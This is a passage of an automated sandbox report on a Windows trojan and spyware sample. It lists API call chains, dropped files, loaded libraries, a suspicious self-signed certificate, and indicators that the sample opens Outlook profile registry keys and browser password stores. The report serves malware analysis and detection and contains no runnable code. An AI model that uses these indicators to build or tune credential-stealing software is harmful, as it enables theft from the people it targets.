            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050F75E810_2_050F75E8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FA7E810_2_050FA7E8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FF60810_2_050FF608
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FC40810_2_050FC408
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050F920810_2_050F9208
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050F001C10_2_050F001C
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FE02810_2_050FE028
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050F7C2810_2_050F7C28
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FAE2810_2_050FAE28
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FFC4810_2_050FFC48
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FCA4810_2_050FCA48
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050F984810_2_050F9848
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050F324310_2_050F3243
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050F004010_2_050F0040
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050F826810_2_050F8268
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FB46810_2_050FB468
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FD08810_2_050FD088
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050F9E8810_2_050F9E88
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050F889810_2_050F8898
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FECA810_2_050FECA8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050F88A810_2_050F88A8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FBAA810_2_050FBAA8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FD6C810_2_050FD6C8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050F72C810_2_050F72C8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FA4C810_2_050FA4C8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FF2E810_2_050FF2E8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050FC0E810_2_050FC0E8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050F8EE810_2_050F8EE8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_050F04F810_2_050F04F8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_3856004010_2_38560040
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_38560E4810_2_38560E48
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_3856076010_2_38560760
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_38561C1810_2_38561C18
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_3856230010_2_38562300
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_3856153010_2_38561530
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_385635C110_2_385635C1
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_3856075010_2_38560750
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_38561C0810_2_38561C08
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_38560E3810_2_38560E38
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_3856152110_2_38561521
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_385622F110_2_385622F1
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: String function: 00402BCE appears 50 times
            Source: hUMdKouQ1H.exeStatic PE information: invalid certificate
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hUMdKouQ1H.exe
            Source: hUMdKouQ1H.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/14@5/5
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,10_2_00403348
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile created: C:\Program Files (x86)\HypotesersJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\doggingJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeMutant created: NULL
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile created: C:\Users\user\AppData\Local\Temp\nss7818.tmpJump to behavior
            Source: hUMdKouQ1H.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000355C2000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035605000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035612000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000355D2000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000355E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: hUMdKouQ1H.exeVirustotal: Detection: 63%
            Source: hUMdKouQ1H.exeReversingLabs: Detection: 50%
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile read: C:\Users\user\Desktop\hUMdKouQ1H.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\hUMdKouQ1H.exe "C:\Users\user\Desktop\hUMdKouQ1H.exe"
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess created: C:\Users\user\Desktop\hUMdKouQ1H.exe "C:\Users\user\Desktop\hUMdKouQ1H.exe"
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess created: C:\Users\user\Desktop\hUMdKouQ1H.exe "C:\Users\user\Desktop\hUMdKouQ1H.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\dogging\Desulphurise\busseronne.iniJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: hUMdKouQ1H.exeStatic file information: File size 1181632 > 1048576
            Source: hUMdKouQ1H.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2581266703.0000000003CDB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_6FF71A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6FF71A98
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_6FF72F60 push eax; ret 0_2_6FF72F8E

            Persistence and Installation Behavior

            barindex
            Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer matches subject exactly) which is a major red flag 2) Invalid signature with untrusted root certificate 3) Suspicious email domain 'Ejerforeninger.Rek' which appears non-corporate and possibly randomly generated 4) Organization name 'Tommelfingerreglernes' is unusual and not a known legitimate company 5) Compilation date (July 2021) is significantly older than the certificate dates (Aug 2024-2025), suggesting possible certificate manipulation 6) The OU field contains strange text 'Buzzardly Scotched misname' that appears randomly generated 7) While the country (GB) and location (Leeds, England) are legitimate, the other certificate attributes strongly suggest this is a fraudulent certificate meant to appear legitimate
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile created: C:\Users\user\AppData\Local\Temp\nsn7848.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
